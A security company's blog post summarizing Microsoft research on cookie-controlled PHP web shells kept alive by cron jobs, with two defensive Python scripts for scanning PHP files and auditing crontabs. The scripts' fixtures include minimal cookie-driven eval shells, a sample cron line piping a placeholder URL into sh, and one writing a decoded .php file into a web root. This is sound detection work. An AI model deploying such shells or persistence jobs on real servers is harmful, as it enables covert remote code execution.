Stealthy PHP Web Shells Exploit Cookies and Cron Jobs for Persistent Linux Server Access
- John Jordan
- Apr 6
- 3 min read
Updated: Apr 13
Microsoft security researchers have uncovered a sophisticated threat campaign targeting Linux servers, where attackers are leveraging HTTP cookies as a covert channel to control PHP web shells. This method allows malicious code to remain dormant and evade detection, activating only when specific cookie values are present. The attackers further ensure persistence by using cron jobs to periodically recreate these web shells, making them difficult to remove.

Key Takeaways
- Attackers use HTTP cookies to control PHP web shells, bypassing traditional detection methods.
- Cron jobs are employed to ensure the web shells persist even after cleanup attempts.
- This technique allows for stealthy, long-term remote code execution on Linux servers.
The Cookie-Controlled Execution Model
Instead of relying on visible URL parameters or request bodies, these advanced PHP web shells utilize HTTP cookies to receive instructions and execute commands. This approach offers significant stealth advantages, as cookie data is often less scrutinized than other parts of an HTTP request. The $_COOKIE superglobal variable in PHP makes it easy for malicious scripts to access and process these attacker-supplied values at runtime.
Microsoft identified several implementations of this technique:
- A loader using multiple layers of obfuscation and runtime checks before processing cookie input to execute a secondary payload.
- A script that segments cookie data to reconstruct essential functions, then conditionally writes and executes a payload.
- A simpler script that uses a single cookie value as a trigger for actions like input execution and file uploads.
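The three implementations above share one structural trait that a defender can look for: a value read from $_COOKIE reaches a code-execution or file-write sink, usually through a decoding layer or a function name assembled at runtime. Because the default Apache and nginx access-log formats record the request line and User-Agent but not the Cookie header, the triggering request leaves little in logs, so static triage of the PHP files on disk is the more reliable place to start. The following Python script is an added example (not code from Microsoft's report or from this article) that performs that triage with regular expressions; the sink and decoder lists, the one-hop taint tracking and the constructed PHP fixtures are all assumptions made here for illustration.

```python
"""Static triage of PHP files for cookie-controlled execution.

Added example for this article (not code from Microsoft's report or from the
article itself). Flags PHP source in which a $_COOKIE value reaches a
code-execution or file-write sink, directly or after one assignment hop, and
notes decoding layers and variable-held function calls that commonly wrap
such payloads. The PHP snippets are constructed fixtures and are never executed.
"""
import re
import sys
from pathlib import Path
from typing import Dict, List

# Functions that execute a string as code/commands or write it to disk (assumed list).
EXEC_SINKS = (
    "eval", "assert", "system", "exec", "shell_exec", "passthru", "popen",
    "proc_open", "create_function", "call_user_func", "call_user_func_array",
    "file_put_contents", "fwrite", "include", "include_once", "require", "require_once",
)
# Decoding / unpacking layers often placed between the cookie and the sink (assumed list).
DECODERS = ("base64_decode", "str_rot13", "gzinflate", "gzuncompress",
            "gzdecode", "hex2bin", "urldecode", "strrev")

COOKIE_RE = re.compile(r"\$_COOKIE\b")
# $name = ... $_COOKIE ... ;   one hop of taint propagation within a statement
ASSIGN_FROM_COOKIE_RE = re.compile(r"(\$[A-Za-z_]\w*)\s*=\s*[^;]*\$_COOKIE")
# $name(...)   a call through a function name held in a variable
VARIABLE_CALL_RE = re.compile(r"\$[A-Za-z_]\w*\s*\(")


def scan_source(src: str) -> List[str]:
    """Return human-readable findings for one PHP source text (empty list = clean)."""
    if not COOKIE_RE.search(src):
        return []
    tainted = {v for v in ASSIGN_FROM_COOKIE_RE.findall(src) if v != "$_COOKIE"}
    # Alternation of everything that carries cookie data: $_COOKIE plus tainted variables.
    taint_pat = r"\$_COOKIE\b" + "".join(r"|" + re.escape(v) + r"\b" for v in sorted(tainted))
    findings = []
    for sink in EXEC_SINKS:
        # sink( ... <tainted> ... ) inside a single statement (no ';' in between)
        if re.search(r"\b" + sink + r"\s*\([^;]*(" + taint_pat + r")", src):
            findings.append(f"cookie value reaches sink {sink}()")
    for dec in DECODERS:
        if re.search(r"\b" + dec + r"\s*\([^;]*(" + taint_pat + r")", src):
            findings.append(f"cookie value passed through decoder {dec}()")
    if VARIABLE_CALL_RE.search(src):
        findings.append("dynamic function call via variable-held name")
    return findings


def scan_directory(root: str) -> Dict[str, List[str]]:
    """Scan every .php file under root; return {path: findings} for files with hits."""
    hits: Dict[str, List[str]] = {}
    for path in Path(root).rglob("*.php"):
        try:
            findings = scan_source(path.read_text(errors="replace"))
        except OSError:
            continue  # unreadable file: skipped here, a production tool should log it
        if findings:
            hits[str(path)] = findings
    return hits


# Constructed fixtures for illustration (benign cookie use vs. the patterns described above).
BENIGN_PHP = """<?php
$lang = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';
if (!in_array($lang, ['en', 'de', 'fr'], true)) { $lang = 'en'; }
echo 'Language: ' . htmlspecialchars($lang);
"""
DIRECT_PHP = """<?php @eval(base64_decode($_COOKIE['k']));"""
SEGMENTED_PHP = """<?php
$c = $_COOKIE;
$f = $c['a'] . $c['b'];
file_put_contents('/var/www/html/.cache.php', $c['d']);
$f($c['z']);
"""

if __name__ == "__main__":
    # Usage: python cookie_shell_triage.py /var/www   (prints findings per file)
    for file_path, found in scan_directory(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        print(file_path)
        for item in found:
            print("  -", item)
```

Run it against a copy of the web root and treat every hit as a lead for manual review rather than a verdict: regular expressions cannot resolve a function name rebuilt from string fragments (the variable-call check is only a coarse stand-in for that case), and a benign plugin that decodes a cookie will also be reported. The useful property is the negative space: a file with no $_COOKIE reference at all is not this family of shell, which narrows a large web root quickly.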
Persistence Through Cron Jobs
A critical component of this attack is the use of cron jobs for persistence. Attackers gain initial access to Linux hosting environments through compromised credentials or exploited vulnerabilities. They then set up a cron job that periodically runs a script to recreate an obfuscated PHP loader. This "self-healing" mechanism ensures that even if security teams remove the malicious file, it will be re-established on the next scheduled execution, creating a reliable remote code execution channel.
Evasion and Stealth
The combination of cookie-based control and cron-based persistence allows attackers to significantly reduce their operational noise and minimize observable indicators in logs. The web shell remains inactive during normal traffic, only activating when specific, deliberate interactions occur. This separation of persistence (via cron) from execution control (via cookies) makes detection and remediation challenging.
Mitigation Strategies
Microsoft recommends several measures to counter this threat:
- Enforce Multi-Factor Authentication (MFA): For hosting control panels, SSH access, and administrative interfaces.
- Monitor Unusual Login Activity: Especially from unfamiliar locations.
- Restrict Shell Interpreter Execution: Limit the ability of web server processes to spawn shell interpreters like sh or bash.
- Audit Cron Jobs and Scheduled Tasks: Regularly review all scheduled tasks for suspicious entries.
- Inspect Suspicious File Creation: Monitor web directories for unusual file creations, particularly those involving decoding utilities like base64.
- Limit Control Panel Shell Capabilities: Restrict or disable shell access in hosting control panels where possible.
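The cron-based persistence described earlier is also the part of this tradecraft that the "Audit Cron Jobs and Scheduled Tasks" and "Inspect Suspicious File Creation" recommendations can surface, because the re-creation job has to name a web-served directory, a decoder or downloader, or an interpreter to pipe into, and it has to fire often enough to undo a cleanup. The script below is an added example written for this article, not code from Microsoft's report: it parses crontab text in the system format (/etc/crontab and /etc/cron.d, which carry a user field) and the per-user format, scores each job by those indicators, and ranks jobs that fire every few minutes highest. The directory names, decoder list, interval threshold and sample crontab are constructed assumptions.

```python
"""Audit crontab entries for web-shell re-creation jobs.

Added example for this article (not Microsoft's or the article's code). Parses
crontab text in system format (user field present) or per-user format and flags
commands matching the persistence pattern: decode or download content, then write
it under a web root or pipe it into an interpreter. Lists and sample are constructed.
"""
import re
import sys
from typing import Dict, List, Optional, Tuple

WEB_DIRS = ("/var/www", "public_html", "htdocs", "wp-content", "/srv/http")  # assumed
DECODERS = ("base64", "xxd -r", "openssl enc -d", "gunzip", "uudecode")  # assumed
INTERPRETER_RES = (r"\|\s*(ba)?sh\b", r"\|\s*php\b", r"\bphp\s+-r\b", r"\beval\b")
DOWNLOADER_RES = (r"\bcurl\b", r"\bwget\b")
SHORT_INTERVAL_MINUTES = 15  # assumed "every few minutes" threshold for self-healing jobs


def parse_entry(line: str, system_crontab: bool) -> Optional[Tuple[str, Optional[str], str]]:
    """Split one crontab line into (schedule, user, command); None for non-job lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None  # blank, comment, or VAR=value line
    if line.startswith("@"):  # @reboot, @daily, ... shortcuts occupy one field
        parts = line.split(None, 2 if system_crontab else 1)
        schedule, rest = parts[0], parts[1:]
    else:  # five time fields, then (user,) command
        parts = line.split(None, 6 if system_crontab else 5)
        if len(parts) < (7 if system_crontab else 6):
            return None
        schedule, rest = " ".join(parts[:5]), parts[5:]
    if system_crontab:
        return (schedule, rest[0], rest[1]) if len(rest) >= 2 else None
    return (schedule, None, rest[0]) if rest else None


def runs_frequently(schedule: str) -> bool:
    """True when the minute field fires every minute or every N <= threshold minutes."""
    if schedule.startswith("@"):
        return False
    minute = schedule.split()[0]
    if minute == "*":
        return True
    m = re.fullmatch(r"\*/(\d+)", minute)
    return bool(m) and int(m.group(1)) <= SHORT_INTERVAL_MINUTES


def assess_command(command: str) -> List[str]:
    """Return the reasons a command resembles web-shell persistence (empty = none)."""
    low = command.lower()
    reasons = []
    if any(d in low for d in WEB_DIRS):
        reasons.append("touches web-served directory")
    if any(d in low for d in DECODERS):
        reasons.append("uses a decoding utility")
    if any(re.search(p, low) for p in INTERPRETER_RES):
        reasons.append("pipes into or invokes an interpreter")
    if any(re.search(p, low) for p in DOWNLOADER_RES):
        reasons.append("downloads remote content")
    if re.search(r">\s*\S+\.php\b", low):
        reasons.append("writes a .php file")
    return reasons


def audit_crontab(text: str, system_crontab: bool = False) -> List[Dict]:
    """One finding per suspicious job; severity orders the triage queue."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        entry = parse_entry(raw, system_crontab)
        if entry is None:
            continue
        schedule, user, command = entry
        reasons = assess_command(command)
        if not reasons:
            continue
        # Two or more indicators on a job firing every few minutes is the self-healing
        # pattern; a single indicator is common in benign jobs and only worth a look.
        if len(reasons) >= 2 and runs_frequently(schedule):
            severity = "high"
        elif len(reasons) >= 2:
            severity = "medium"
        else:
            severity = "low"
        findings.append({"line": lineno, "user": user, "schedule": schedule,
                         "command": command, "reasons": reasons, "severity": severity})
    return findings


# Constructed per-user crontab for illustration; not taken from any real host.
SAMPLE_USER_CRONTAB = """\
# constructed sample crontab
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh --quiet
*/10 * * * * echo "PLACEHOLDER_BASE64" | base64 -d > /var/www/html/wp-content/.cache.php
@daily /usr/bin/certbot renew --quiet
* * * * * curl -s http://placeholder.invalid/x | sh
"""

if __name__ == "__main__":
    # Usage: python cron_audit.py /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*
    for path in sys.argv[1:]:
        is_system = path == "/etc/crontab" or path.startswith("/etc/cron.d/")
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in audit_crontab(fh.read(), system_crontab=is_system):
                print(f"{path}:{f['line']} [{f['severity']}] {f['schedule']} {f['command']}")
                for r in f["reasons"]:
                    print("    -", r)
```

Point it at the crontab files themselves rather than at `crontab -l` output for one user, since the hosting account, www-data and root each have their own spool entry. Scripts dropped into /etc/cron.hourly or /etc/cron.d as files are not crontab lines and need a separate review of those directories; the same goes for systemd timers on hosts that use them, which this parser does not cover.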
By shifting execution logic into cookies and leveraging legitimate system processes like cron, threat actors can achieve persistent post-compromise access that evades many traditional security controls.
By staying vigilant and adopting safe browsing practices, users can significantly reduce their exposure to these evolving threats. As cyber threats continue to evolve, your security strategy needs to evolve with them. BetterWorld Technology delivers adaptive cybersecurity solutions designed to keep your business secure while supporting innovation. Connect with us today to schedule a personalized consultation.
Sources
- Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers, The Hacker News.
- Cookie-controlled PHP webshells: A stealthy tradecraft in Linux hosting environments, Microsoft.
